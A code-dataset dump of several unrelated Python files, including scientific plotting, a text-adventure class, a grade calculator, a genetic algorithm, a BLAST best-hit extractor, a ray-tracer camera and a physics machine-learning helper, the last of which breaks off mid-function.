try:\n samples, _ = model.sample(n_samples)\n except ValueError:\n samples = model.sample(n_samples)\n\n for mark_ind, ax in enumerate(row_axes):\n if is_histogram:\n H = np.histogram2d(samples[:, -1], samples[:, mark_ind],\n bins=bins, normed=True)[0]\n H = sampling_frequency * mean_rate * H.T / place_occupancy\n X, Y = np.meshgrid(*bins)\n ax.pcolormesh(X, Y, H, vmin=0)\n else:\n ax.scatter(samples[:, -1], samples[:, mark_ind], alpha=0.1)\n ax.set_title(\n f'Electrode {electrode_ind + 1}, Feature {mark_ind + 1}')\n\n plt.xlim((bins[0].min(), bins[0].max()))\n plt.ylim((bins[1].min(), bins[1].max()))\n plt.tight_layout()\n\n return axes\n\n def plot_replay_state_transition(self):\n \"\"\"Plot the replay state transition model over speed lags.\"\"\"\n lagged_speeds = np.arange(0, 30, .1)\n probablity_replay = self.replay_state_transition_(lagged_speeds)\n\n fig, axes = plt.subplots(2, 1, figsize=(5, 5), sharex=True)\n axes[0].plot(lagged_speeds, probablity_replay[:, 1])\n axes[0].set_ylabel('Probability Replay')\n axes[0].set_title('Previous time step is replay')\n\n axes[1].plot(lagged_speeds, probablity_replay[:, 0])\n axes[1].set_xlabel('Speed t - 1')\n axes[1].set_ylabel('Probability Replay')\n axes[1].set_title('Previous time step is not replay')\n\n plt.tight_layout()\n\n def plot_movement_state_transition(self, ax=None):\n \"\"\"Plot the sped up empirical movement state transition.\n\n Parameters\n ----------\n ax : matplotlib axis or None, optional\n\n \"\"\"\n if ax is None:\n ax = plt.gca()\n place_t, place_t_1 = np.meshgrid(self.place_bin_edges_,\n self.place_bin_edges_)\n vmax = np.percentile(self.movement_state_transition_, 97.5)\n cax = ax.pcolormesh(place_t, place_t_1,\n self.movement_state_transition_, vmin=0, vmax=vmax)\n ax.set_xlabel('position t')\n ax.set_ylabel('position t - 1')\n ax.set_title('Movement State Transition')\n plt.colorbar(cax, label='probability')\n\n @staticmethod\n def plot_multiunit(multiunit, position, is_replay, axes=None):\n '''Plot the multiunit training data for comparison with the\n fitted model.'''\n multiunit = np.asarray(multiunit.copy())\n position = atleast_2d(np.asarray(position.copy()))\n is_replay = np.asarray(is_replay.copy()).squeeze()\n\n if axes is None:\n _, n_marks, n_signals = multiunit.shape\n _, axes = plt.subplots(n_signals, n_marks,\n figsize=(n_marks * 3, n_signals * 3),\n sharex=True, sharey=True)\n zipped = zip(axes, np.moveaxis(multiunit, 2, 0))\n for electrode_ind, (row_axes, m) in enumerate(zipped):\n not_nan = np.any(~np.isnan(m), axis=-1)\n for mark_ind, ax in enumerate(row_axes):\n ax.scatter(position[not_nan & ~is_replay],\n m[not_nan & ~is_replay, mark_ind],\n alpha=0.1, zorder=-1)\n ax.set_title(\n f'Electrode {electrode_ind + 1}, Feature {mark_ind + 1}')\n\n plt.xlim((np.nanmin(position), np.nanmax(position)))\n\n @staticmethod\n def plot_lfp_power(lfp_power, is_replay):\n '''Plot the lfp power training data for comparison with the\n fitted model.'''\n lfp_power = np.log(np.asarray(lfp_power.copy()))\n is_replay = np.asarray(is_replay.copy()).squeeze()\n n_lfps = lfp_power.shape[1]\n lfp_ind = np.arange(n_lfps)\n\n fig, axes = plt.subplots(n_lfps, n_lfps,\n figsize=(2 * n_lfps, 2 * n_lfps),\n sharex=True, sharey=True)\n combinations_ind = combinations_with_replacement(lfp_ind, 2)\n for (ind1, ind2) in combinations_ind:\n axes[ind1, ind2].scatter(lfp_power[~is_replay, ind1],\n lfp_power[~is_replay, ind2],\n label='No Replay', alpha=0.5)\n axes[ind1, ind2].scatter(lfp_power[is_replay, ind1],\n lfp_power[is_replay, ind2],\n label='Replay', alpha=0.5)\n axes[ind1, ind2].set_title(f'Electrode {ind1 + 1} vs. {ind2 + 1}')\n if ind1 != ind2:\n axes[ind2, ind1].axis('off')\n\n axes[0, 0].legend()\n plt.tight_layout()\n\n def plot_fitted_lfp_power_model(self, n_samples=1000):\n replay_model = self._lfp_likelihood.keywords['replay_model']\n no_replay_model = self._lfp_likelihood.keywords['no_replay_model']\n try:\n replay_samples, _ = replay_model.sample(n_samples=n_samples)\n no_replay_samples, _ = no_replay_model.sample(n_samples=n_samples)\n samples = np.concatenate((replay_samples, no_replay_samples),\n axis=0)\n except ValueError:\n samples = np.concatenate(\n (replay_model.sample(n_samples=n_samples),\n no_replay_model.sample(n_samples=n_samples)), axis=0)\n\n is_replay = np.zeros((n_samples * 2,), dtype=np.bool)\n is_replay[:n_samples] = True\n\n self.plot_lfp_power(np.exp(samples), is_replay)\n\n def save_model(self, filename='model.pkl'):\n raise NotImplementedError\n # Won't work until patsy designInfo becomes pickleable\n joblib.dump(self, filename)\n\n @staticmethod\n def load_model(filename='model.pkl'):\n raise NotImplementedError\n # Won't work until patsy designInfo becomes pickleable\n return joblib.load(filename)\n","sub_path":"replay_identification/decoders.py","file_name":"decoders.py","file_ext":"py","file_size_in_byte":22987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"374877208","text":"\"\"\"Test the Carrier class object.\"\"\"\nfrom shipengine_sdk.errors import ShipEngineError\nfrom shipengine_sdk.models import Carrier\n\n\nclass TestCarrier:\n def test_invalid_carrier(self) -> None:\n try:\n Carrier(code=\"royal_mail\")\n except ShipEngineError as err:\n assert err.message == \"Carrier [royal_mail] not currently supported.\"\n\n def test_to_json(self) -> None:\n carrier = Carrier(code=\"fedex\")\n assert type(carrier.to_json()) is str\n","sub_path":"tests/models/carriers/test_carrier.py","file_name":"test_carrier.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"393450684","text":"class Location:\r\n\t#constructor\r\n\tdef __init__(self,\r\n\t name:str,\r\n\t description:str,\r\n\t to_north:str = \"\",\r\n\t to_east:str = \"\",\r\n\t to_south:str = \"\",\r\n\t to_west:str = \"\",\r\n\t items:list = [],\r\n\t item_required:str = \"\"):\r\n\t\t\r\n\t\tself._name:str = name\r\n\t\tself._description:str = description\r\n\t\tself._to_north:str = to_north\r\n\t\tself._to_east:str = to_east\r\n\t\tself._to_south:str = to_south\r\n\t\tself._to_west:str = to_west\r\n\t\tself._items:list = items\r\n\t\tself._item_required:str = item_required\r\n\t\t\r\n\t# properties\r\n\t@property\r\n\tdef name(self) -> str:\r\n\t\treturn self._name\r\n\r\n\t@property\r\n\tdef description(self) -> str:\r\n\t\treturn self._description\r\n\r\n\t@property\r\n\tdef to_north(self) -> str:\r\n\t\treturn self._to_north\r\n\r\n\t@property\r\n\tdef to_east(self) -> str:\r\n\t\treturn self._to_east\r\n\r\n\t@property\r\n\tdef to_south(self) -> str:\r\n\t\treturn self._to_south\r\n\r\n\t@property\r\n\tdef to_west(self) -> str:\r\n\t\treturn self._to_west\r\n\t\r\n\t@property\r\n\tdef items(self) ->list:\r\n\t\t''' return a list of all items in this location '''\r\n\t\treturn self._items\r\n\t\r\n\t@items.setter\r\n\tdef items(self, list_of_items:list) -> None:\r\n\t\t''' allows items in this location to be set in bulk '''\r\n\t\t# list_of_items is a list of dictionary keys sent as\r\n\t\t# [\"torch\", \"key\"]\r\n\t\tself._items = list_of_items\t\r\n\t\r\n\t@property\r\n\tdef item_required(self) -> str:\r\n\t\t''' return item required to enter this location '''\r\n\t\treturn self._item_required \r\n\t\r\n\t@item_required.setter\t\t\r\n\tdef item_required(self, value:str) -> None:\r\n\t\t''' set the item required to enter this location '''\r\n\t\tself._item_required = value\t\r\n\t\r\n\t# methods\r\n\tdef add_item(self, item_key:str) -> None:\r\n\t\t''' add an item to the list of items in this location '''\r\n\t\tif item_key not in self._items:\r\n\t\t\tself._items.append(item_key)\r\n\t\r\n\tdef get_items_count(self) -> int:\r\n\t\t''' return no. of items in this location '''\r\n\t\treturn len(self._items) \r\n\t\t\t\r\n\tdef location_dict(self) -> dict:\r\n\t\t''' return a dictionary of surrounding locations '''\r\n\t\treturn {'n':self._to_north, 'e':self._to_east, 's':self._to_south, 'w':self._to_west} # Dictionary of strings\t\r\n\t\t \r\n\tdef location_list(self) -> list:\r\n\t\t''' return a list of surrounding locations '''\r\n\t\treturn [self._to_north, self._to_east, self._to_south, self._to_west] # List of strings\r\n\t\r\n\tdef remove_item(self, item_key:str) -> None:\r\n\t\t''' removes an item from list of items in this location '''\r\n\t\tif item_key in self._items:\r\n\t\t\tself._items.remove(item_key)\r\n\t\t\r\n\tdef set_locations(self, to_north:str, to_east:str, to_south:str, to_west:str) -> None:\r\n\t\t''' allows surrounding locations to be changed '''\r\n\t\t#self-corrects for spaces e.g \" \" = \"\", \"room \" = \"room\"\r\n\t\tself._to_north = to_north.strip()\r\n\t\tself._to_east = to_east.strip()\r\n\t\tself._to_south = to_south.strip()\r\n\t\tself._to_west = to_west.strip()\r\n\t\r\n\tdef display_location(self) -> list:\r\n\t\t''' descrbe the current location, any items inside it, and exits '''\r\n\t\texits:list = []\r\n\t\tif self._to_north != \"\":\r\n\t\t\texits.append(\"north\")\r\n\t\tif self._to_east != \"\":\r\n\t\t\texits.append(\"east\")\r\n\t\tif self._to_south!= \"\":\r\n\t\t\texits.append(\"south\")\r\n\t\tif self._to_west != \"\":\r\n\t\t\texits.append(\"west\")\t\t\t\t\r\n\t\r\n\t\tprint(f\"You are in {self._description}\")\r\n\t\tif len(exits) > 0:\r\n\t\t\toutput:str = \"There are exits: \"\r\n\t\t\tfor exit in exits:\r\n\t\t\t\toutput += exit + \", \"\r\n\t\t\toutput = output.strip()[:-1] # remove comma\r\n\t\telse:\r\n\t\t\toutput = \"There are no exits\"\r\n\t\tprint(output)\r\n\t\r\n\t\tif len(self._items) > 0:\r\n\t\t\toutput = \"In this location there is: \"\r\n\t\t\tfor item in self._items:\r\n\t\t\t\toutput += item + \", \"\r\n\t\t\toutput = output.strip()[:-1] # remove comma\r\n\t\t\tprint(output)\r\n\t\r\n\t\treturn exits\t","sub_path":"Python/OOP/05-Adventure Game+weapon/location.py","file_name":"location.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"332043540","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 28 11:37:16 2020\r\n\r\n@author: Ashish\r\n\r\nUse the logic for assigning grade to student defined in\r\nassign_grade_to_student_using_function.py script.\r\nThe idea is to create a class with a constructor to initialise\r\nrelevant variables like student exam related data from the user,\r\nroll number, test mark, exam mark etc.\r\nIt will then pass this data as argument into another function.\r\nThe other function will pull the data out of the arguments\r\nand use them for further analysis.\r\n\r\nNote: the __init__() is a constructor to initialise variables\r\n\r\n\"\"\"\r\n\r\nstudent_info_list = []\r\n\r\n\r\nclass GradeAssigner:\r\n\r\n def __init__(self):\r\n print(\"The init is called\")\r\n # self.test_mark = test_mark\r\n # self.tut_mark = tut_mark\r\n # self.exam_mark = exam_mark\r\n\r\n def get_student_details(self):\r\n stud_num = input(\"Enter the student number: \")\r\n stud_tutorial_mark = float(input(\"Enter student's tutorial mark:\"))\r\n stud_test_mark = float(input(\"Enter student's test mark:\"))\r\n stud_exam_mark = float(input(\"Enter student exam mark: \"))\r\n # add data to list\r\n student_info_list.append(stud_num)\r\n student_info_list.append(stud_tutorial_mark)\r\n student_info_list.append(stud_test_mark)\r\n student_info_list.append(stud_exam_mark)\r\n # return a list of items\r\n return student_info_list\r\n\r\n def calculate_grade(self, student_info_list):\r\n stud_num = student_info_list[0]\r\n stud_test_mark = student_info_list[1]\r\n stud_tutorial_mark = student_info_list[2]\r\n stud_exam_mark = student_info_list[3]\r\n if stud_tutorial_mark+stud_test_mark/2 < 40:\r\n grade = \"Fail\"\r\n final_mark = (stud_tutorial_mark+stud_test_mark+2*stud_exam_mark)/4\r\n if 80 <= final_mark <= 100:\r\n grade = \"A\"\r\n elif 70 <= final_mark < 80:\r\n grade = \"B\"\r\n elif 60 <= final_mark < 70:\r\n grade = \"C\"\r\n elif 50 <= final_mark < 60:\r\n grade = \"D\"\r\n else:\r\n grade = \"E\"\r\n return stud_num, final_mark, grade\r\n\r\n\r\n# student = GradeAssigner() # create an object of the class\r\nstudent = GradeAssigner()\r\nget_student_info = student.get_student_details()\r\nsnum, fmark, grade = student.calculate_grade(get_student_info)\r\nprint(\"student %s's final mark is %d and grade is %s.\" % (snum, fmark, grade))\r\n","sub_path":"scripts/fundamentals/cls_student_grade_assigner.py","file_name":"cls_student_grade_assigner.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"510226629","text":"import pygame\r\nimport random\r\nimport math\r\n\r\nfrom Dot import Dot\r\nfrom Environment import Environment\r\n\r\n\r\nclass Population:\r\n \"\"\"\r\n Population class.\r\n Consists of Dots used for the simulation.\r\n\r\n :param size: Quantity of dots.\r\n :type size: int\r\n\r\n :param env: Environment that population is working in.\r\n :type env: Environment\r\n \"\"\"\r\n def __init__(self, size, env):\r\n self.POPULATION_SIZE = size\r\n self.ENV = env\r\n self.POSSIBLE_STEPS = env.SCREEN_SIZE_X * env.SCREEN_SIZE_Y\r\n\r\n self.samples = []\r\n self.fitness_sum = 0\r\n self.generation = 1\r\n self.best_dot = 0\r\n self.min_step = self.POSSIBLE_STEPS\r\n\r\n Dot.dead = 0\r\n\r\n for i in range(self.POPULATION_SIZE):\r\n self.samples.append(Dot(self.ENV.START_POINT))\r\n \r\n\r\n def move_dots(self):\r\n \"\"\"\r\n Moves a dot in the simulation environment.\r\n \"\"\"\r\n for dot in self.samples:\r\n dot.make_decision(self.ENV, self.POSSIBLE_STEPS)\r\n \r\n\r\n def extinct(self):\r\n \"\"\"\r\n Determines whether all the dots in the population are dead.\r\n\r\n\t:return: Whether a population of dots are dead.\r\n\t:rtype: bool\r\n \"\"\"\r\n return Dot.dead == self.POPULATION_SIZE\r\n\r\n \r\n def perform_natural_selection(self):\r\n \"\"\"\r\n Assigns the best parent for the next generation based on the parent\r\n with the best fitness score.\r\n \"\"\"\r\n next_generation = [Dot(self.ENV.START_POINT)] * len(self.samples)\r\n\r\n self.set_best_dot()\r\n self.calculate_fitness_sum()\r\n\r\n next_generation[0] = self.samples[self.best_dot].make_baby(self.ENV.START_POINT)\r\n next_generation[0].most_fit = True\r\n\r\n for dot in range(1, len(next_generation)):\r\n #select parent\r\n parent = self.select_parent()\r\n\r\n #then get offspring\r\n next_generation[dot] = parent.make_baby(self.ENV.START_POINT)\r\n \r\n self.samples = next_generation\r\n self.generation += 1\r\n Dot.dead = 0\r\n self.fitness_sum = 0\r\n\r\n\r\n def calculate_fitness(self):\r\n \"\"\"\r\n Calculates the fitnes score of each dot.\r\n \"\"\"\r\n for dot in self.samples:\r\n dot.calculate_fitness(self.ENV) \r\n\r\n\r\n def calculate_fitness_sum(self):\r\n \"\"\"\r\n Calculates the fitness sum for all the dots in the population.\r\n This will be used to determine the best parent.\r\n \"\"\"\r\n self.fitness_sum = 0\r\n for dot in self.samples:\r\n self.fitness_sum += dot.fitness\r\n \r\n\r\n def select_parent(self):\r\n \"\"\"\r\n Selects a parent for the next generation based on the best fitness score.\r\n\r\n\t:return: The best performing dot.\r\n\t:rtype: Dot\r\n \"\"\"\r\n rand = random.uniform(0, self.fitness_sum)\r\n\r\n running_sum = 0\r\n for dot in self.samples:\r\n running_sum += dot.fitness\r\n if running_sum > rand:\r\n return dot\r\n\r\n\r\n def mutate_babies(self):\r\n \"\"\"\r\n Mutates all of the next generation of dots.\r\n Note: The most fit dot of the previous generation is immortal and moved\r\n into the next generation without mutating, hence the range(1,...).\r\n \"\"\"\r\n for dot in range(1, len(self.samples)):\r\n self.samples[dot].genetics.mutate()\r\n\r\n\r\n def set_best_dot(self):\r\n \"\"\"\r\n Select the best performing dot out of a generation. \r\n The most 'fit' dot is defined as one that has the highest fitness score\r\n and the least amount of steps taken to get to the goal (or as close to).\r\n \"\"\"\r\n max_fitness = 0.0 \r\n max_idx = 0\r\n for d in range(len(self.samples)):\r\n if self.samples[d].fitness > max_fitness:\r\n max_fitness = self.samples[d].fitness\r\n max_idx = d\r\n \r\n self.best_dot = max_idx\r\n \r\n if self.samples[self.best_dot].goal_found:\r\n min_step = self.samples[self.best_dot].genetics.step\r\n self.min_step = min_step\r\n\r\n\r\n","sub_path":"src/Population.py","file_name":"Population.py","file_ext":"py","file_size_in_byte":4120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"567272293","text":"import os\n\nPATH = \"F:\\Sonya\\GeekBrains\\\\01_python_basics\\\\venv\"\nall_sizes = {100: 0, 1000: 0, 10000: 0, 100_000: 0, 1_000_000: 0, 10_000_000: 0}\ni = 0\nfor root, dirs, files in os.walk(PATH):\n for file in files:\n f_path = os.path.join(root, file)\n size = os.stat(f_path).st_size\n file_extension = file.split('.')[-1]\n # print(file, file_extension, size)\n\n if size > 10_000_000:\n all_sizes[10_000_000] = all_sizes[10_000_000] + 1\n\n else:\n for template_size in all_sizes.keys():\n if size < template_size:\n all_sizes[template_size] = all_sizes[template_size] + 1\n break\nprint(all_sizes)\nresult_sum = 0\nfor count in all_sizes.values():\n result_sum += count\nprint(result_sum)\n","sub_path":"lesson_07/dz_04.py","file_name":"dz_04.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"601150793","text":"#!/usr/bin/env python\n\n\"\"\"\nHomoloGene App Template\nshould be copied and used for all HomoloGene apps\n* step 1\n* step 2\n* step 3\noutput:\n\"\"\"\n\n#\n# Author: David Managadze\n#\n\n\n# region: imports\nfrom sys import argv\nfrom os import path\nfrom sqlite3 import connect\n\nfrom hgappcommon import hg_bootstrap, HGApp\nfrom homologene.lib.shell import move_dir, remove\n\nhg_bootstrap() # find and add HomoloGene source root to the system path\nfrom homologene.lib.build import HGBuild\n\n# endregion\n\n# region: constants\n\n# endregion\n\n# region: variables\n\n# endregion\n\n\n\n\n\nclass my_app(HGApp):\n \"\"\"\n App class, inherits from HGApp class\n \"\"\"\n\n def blast_best_hits(self, fin):\n \"\"\"\n read input file, return generator of best (first) blast hits\n :param fin: input file name\n :type fin: str\n :return: best blast hits\n :rtype: generator(hits)\n \"\"\"\n seen = dict()\n fh = open(fin)\n for line in fh:\n line = line.strip()\n if line == '' or line.startswith('#'): continue\n key, val = line.split('\\t', 1)\n if key not in seen: # this is new query ID, i.e. best hit\n seen[key] = val\n yield line\n\n def extract_bb_hits(self, tid1, tid2, fin1, fin2):\n \"\"\"\n extract bidirectional best hits from two files\n :param fin1:\n :type fin1:\n :param fin2:\n :type fin2:\n :return:\n :rtype:\n \"\"\"\n self.log_info(\"* extracting BBH from files:\")\n self.log_info(\" o file1:\", fin1 )\n self.log_info(\" o file2:\", fin2)\n # read query,subject of the best hits in the first file into dict\n hits1 = dict()\n for hit in self.blast_best_hits(fin1):\n query, subject, rest = hit.split('\\t', 2)\n # print \"file1\", query, subject\n hits1[query] = subject\n for hit in self.blast_best_hits(fin2):\n query, subject, rest = hit.split('\\t', 2)\n # print \"file2\", query, subject\n if hits1.get(subject,'') == query:\n # self.log_info(\" + found BBH: taxid1:\", query, \"taxid2:\", subject)\n yield tid1, tid2, subject, query\n\n\n\n def init(self):\n \"\"\"\n initialize application: add commandline parameters, check input, set variables etc\n \"\"\"\n self.arg_parser.add_argument(\"-b\", \"--build\", help=\"build directory\")\n self.arg_parser.add_argument(\"-i\", \"--input\", help=\"directory of input fasta files\")\n\n # mandatory! this must be *after* all the arguments\n self.post_init()\n\n if not path.exists(self.args.input):\n self.die(\"input path does not exist: \", self.args.input)\n if not path.exists(self.args.build):\n self.die(\"build path does not exist: \", self.args.input)\n\n # create tmp output directories\n # self.dir_tmp_tree = path.join(self.dir_tmp, \"tree\")\n # make_dir(self.dir_tmp_tree)\n\n # create connection to db\n self._dbf = path.join(self.dir_tmp, \"bbh.db\")\n self._dbconn = connect(self._dbf)\n self._dbcursor = self._dbconn.cursor()\n self._dbcursor.execute(\"DROP TABLE IF EXISTS bbh;\")\n self._dbcursor.execute(\"CREATE TABLE bbh(tax_id1 int, tax_id2 int, acc_ver1, acc_ver2);\")\n\n def run(self):\n build = HGBuild(self.args.build)\n for tax_id1 in build.get_tax_info():\n for tax_id2 in build.get_tax_info():\n if tax_id1 == tax_id2: continue\n # tax_id1 = 9606\n # tax_id2 = 10090\n fin1 = path.join(self.args.input, str(tax_id1) + \"_\" + str(tax_id2) + \".blastp.tab\")\n fin2 = path.join(self.args.input, str(tax_id2) + \"_\" + str(tax_id1) + \".blastp.tab\")\n # print tax_id1, tax_id2\n if not path.isfile(fin1):\n self.die(\"input file does not exist: \", fin1)\n if not path.isfile(fin2):\n self.die(\"input file does not exist: \", fin2)\n for bbh_pair in self.extract_bb_hits(tax_id1, tax_id2, fin1, fin2):\n # print bbh_pair\n self._dbcursor.execute(\"INSERT INTO bbh VALUES (?,?,?,?);\", bbh_pair)\n\n def exit(self):\n self.log_info(\"* indexing database\")\n self._dbcursor.execute(\"CREATE INDEX bbh_tid1 ON bbh(tax_id1);\")\n self._dbcursor.execute(\"CREATE INDEX bbh_tid2 ON bbh(tax_id2);\")\n self._dbcursor.execute(\"CREATE INDEX bbh_acc1 ON bbh(acc_ver1);\")\n self._dbcursor.execute(\"CREATE INDEX bbh_acc2 ON bbh(acc_ver2);\")\n self._dbconn.commit()\n self._dbconn.close()\n self.log_info(\"* cleaning up\")\n self.log_info(\" - moving\", self._dbf, \"to:\", self.dir_out)\n move_dir(self._dbf, self.dir_out)\n self.log_info(\" - removing\", self.dir_tmp)\n remove(self.dir_tmp)\n self.log_info(\"\\n# --- FINISHED --- #\\n\")\n\n\n\n\nif __name__ == \"__main__\":\n my_app.main(argv=argv, name='my_app_name', version='0.1', logmode='debug', conf=\"conf/homologene.conf\")\n\n","sub_path":"extract_bbh.py","file_name":"extract_bbh.py","file_ext":"py","file_size_in_byte":5101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"377737349","text":"import math\nfrom vec3 import vec3\nfrom ray import ray\n\nclass camera:\n\tdef __init__(self, lookFrom, lookAt, vUp, fovy, aspectRatio, aperture, distToFocus):\n\t\tself.lookFrom = lookFrom\n\t\tself.lookAt = lookAt\n\t\tself.vUp = vUp\n\t\tself.fovy = math.radians(fovy)\n\t\tself.aspectRatio = aspectRatio\n\t\tself.lenseRadius = aperture/2\n\t\tself.distToFocus = distToFocus\n\t\t\n\t\tself.halfHeight = math.tan(self.fovy/2) * distToFocus\n\t\tself.halfWidth = self.halfHeight * aspectRatio\n\t\t\n\t\tself.w = vec3.normalize(lookAt-lookFrom)\n\t\tself.u = vec3.normalize(vec3.cross(self.w,vUp))\n\t\tself.v = vec3.cross(self.u,self.w)\n\n\t\tself.lowerLeftCorner = lookFrom + self.w*distToFocus - self.v*self.halfHeight - self.u*self.halfWidth\t\t\n\t\t\n\tdef getRay(self, u, v):\t\t\n\t\ttemp = vec3.randomPointInDisc() * self.lenseRadius\n\t\tapertureOffset = self.u * temp.x() + self.v * temp.y()\n\t\treturn ray(self.lookFrom + apertureOffset, self.lowerLeftCorner + self.u*u*2*self.halfWidth + self.v*v*2*self.halfHeight - (self.lookFrom + apertureOffset))","sub_path":"py/rt/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"403427775","text":"from .base import DiscordObject\nfrom .guild import Guild\nfrom .channel import Channel\nfrom .user import User\n\n\nclass Invite(DiscordObject):\n \"\"\"Represents a code that when used, adds a user to a guild.\n\n .. versionadded:: 0.2.0\n\n Attributes:\n code (:obj:`str`): the invite code (unique ID)\n guild (:class:`.Guild`): the guild this invite is for\n channel (:class:`.Channel`): the channel this invite is for\n \"\"\"\n\n def __init__(self, code=\"\", guild=None, channel=None):\n self.code = code\n self.guild = guild\n self.channel = channel\n\n async def _from_api_ext(self, key, value):\n if key == 'guild':\n setattr(self, key, await Guild.from_api_res(value))\n elif key == 'channel':\n setattr(self, key, await Channel.from_api_res(value))\n else:\n return await super()._from_api_ext(key, value)\n\n\nclass InviteMetadata(DiscordObject):\n \"\"\"Represents the invite metadata\n\n .. versionadded:: 0.2.0\n\n Attributes:\n inviter (:class:`.A`): user object user who created the invite\n uses (:obj:`int`): number of times this invite has been used\n max_uses (:obj:`int`): max number of times this invite can be used\n max_age (:obj:`int`): duration (in seconds) after which the invite expires\n temporary (:obj:`bool`): whether this invite only grants temporary membership\n created_at (:obj:`int`): timestamp when this invite was created\n revoked (:obj:`bool`): whether this invite is revoked\n \"\"\"\n\n def __init__(self, inviter=None, uses=0, max_uses=0, max_age=0, temporary=False,\n created_at=None, revoked=False):\n self.inviter = inviter\n self.uses = uses\n self.max_uses = max_uses\n self.max_age = max_age\n self.temporary = temporary\n self.created_at = created_at\n self.revoked = revoked\n\n async def _from_api_ext(self, key, value):\n if key == 'inviter':\n setattr(self, key, await User.from_api_res(value))\n else:\n return await super()._from_api_ext(key, value)\n\n\n__all__ = [\n 'Invite',\n 'InviteMetadata',\n]\n","sub_path":"discordaio/invite.py","file_name":"invite.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"408551025","text":"import math\nimport os\nfrom concurrent.futures import ThreadPoolExecutor\nfrom math import floor, log10\n\nimport numpy as np\n\nimport pandas as pd\nimport uproot\nimport xgboost as xgb\nfrom hipe4ml.model_handler import ModelHandler\nimport ROOT\nfrom ROOT import (TF1, TH1D, TH2D, TH3D, TCanvas, TPaveStats, TPaveText, gStyle)\n\nfrom root_numpy import array2tree\n\ndef get_skimmed_large_data(data_path, cent_classes, pt_bins, ct_bins, training_columns, application_columns, mode, split):\n print('\\n++++++++++++++++++++++++++++++++++++++++++++++++++')\n print ('\\nStarting BDT appplication on large data')\n\n if mode == 3:\n handlers_path = os.environ['HYPERML_MODELS_3'] + '/handlers'\n efficiencies_path = os.environ['HYPERML_EFFICIENCIES_3']\n\n if mode == 2:\n handlers_path = os.environ['HYPERML_MODELS_2'] + '/handlers'\n efficiencies_path = os.environ['HYPERML_EFFICIENCIES_2']\n\n executor = ThreadPoolExecutor(8)\n iterator = uproot.pandas.iterate(data_path, 'DataTable', executor=executor, reportfile=True)\n\n df_applied = pd.DataFrame()\n\n for current_file, data in iterator:\n\n rename_df_columns(data)\n \n print('current file: {}'.format(current_file))\n print ('start entry chunk: {}, stop entry chunk: {}'.format(data.index[0], data.index[-1]))\n \n for cclass in cent_classes:\n for ptbin in zip(pt_bins[:-1], pt_bins[1:]):\n for ctbin in zip(ct_bins[:-1], ct_bins[1:]):\n info_string = '_{}{}_{}{}_{}{}'.format(cclass[0], cclass[1], ptbin[0], ptbin[1], ctbin[0], ctbin[1])\n\n filename_handler = handlers_path + '/model_handler' + info_string + split +'.pkl'\n filename_efficiencies = efficiencies_path + '/Eff_Score' + info_string + split +'.npy'\n\n model_handler = ModelHandler()\n model_handler.load_model_handler(filename_handler)\n\n eff_score_array = np.load(filename_efficiencies)\n tsd = eff_score_array[1][-1]\n\n data_range = f'{ctbin[0]}@tsd')\n df_tmp = df_tmp[application_columns]\n\n df_applied = df_applied.append(df_tmp, ignore_index=True, sort=False)\n\n print(df_applied.info(memory_usage='deep'))\n return df_applied\n \n\ndef expected_signal_counts(bw, cent_range, pt_range, eff, nevents, n_body=2):\n correction = 0.4 # Very optimistic, considering it constant with centrality\n\n if n_body == 2:\n correction *= 0.25\n if n_body == 3:\n correction *= 0.4\n\n cent_bins = [10, 40, 90]\n\n signal = 0\n for cent in range(cent_range[0]+1, cent_range[1]):\n for index in range(0, 3):\n if cent < cent_bins[index]:\n signal = signal + \\\n nevents[cent] * \\\n bw[index].Integral(pt_range[0], pt_range[1], 1e-8)\n break\n\n return int(round(2*signal * eff * correction))\n\n\ndef significance_error(signal, background):\n signal_error = np.sqrt(signal + 1e-10)\n background_error = np.sqrt(background + 1e-10)\n\n sb = signal + background + 1e-10\n sb_sqrt = np.sqrt(sb)\n\n s_propag = (sb_sqrt + signal / (2 * sb_sqrt))/sb * signal_error\n b_propag = signal / (2 * sb_sqrt)/sb * background_error\n\n if signal+background == 0:\n return 0\n return np.sqrt(s_propag * s_propag + b_propag * b_propag)\n\n\ndef expo(x, tau):\n return np.exp(-x / (tau * 0.029979245800))\n\n\ndef h2_preselection_efficiency(ptbins, ctbins, name='PreselEff'):\n th2 = TH2D(name, ';#it{p}_{T} (GeV/#it{c});c#it{t} (cm);Preselection efficiency',\n len(ptbins) - 1, np.array(ptbins, 'double'), len(ctbins) - 1, np.array(ctbins, 'double'))\n th2.SetDirectory(0)\n\n return th2\n\n\ndef h2_generated(ptbins, ctbins, name='Generated'):\n th2 = TH2D(name, ';#it{p}_{T} (GeV/#it{c});c#it{t} (cm); Generated', len(ptbins)-1,\n np.array(ptbins, 'double'), len(ctbins) - 1, np.array(ctbins, 'double'))\n th2.SetDirectory(0)\n\n return th2\n\n\ndef h2_rawcounts(ptbins, ctbins, name='RawCounts', suffix=''):\n th2 = TH2D(f'{name}{suffix}', ';#it{p}_{T} (GeV/#it{c});c#it{t} (cm);Raw counts', len(ptbins)-1,\n np.array(ptbins, 'double'), len(ctbins) - 1, np.array(ctbins, 'double'))\n th2.SetDirectory(0)\n\n return th2\n\n\ndef h2_significance(ptbins, ctbins, name='Significance', suffix=''):\n th2 = TH2D(f'{name}{suffix}', ';#it{p}_{T} (GeV/#it{c});c#it{t} (cm);Significance', len(ptbins)-1,\n np.array(ptbins, 'double'), len(ctbins) - 1, 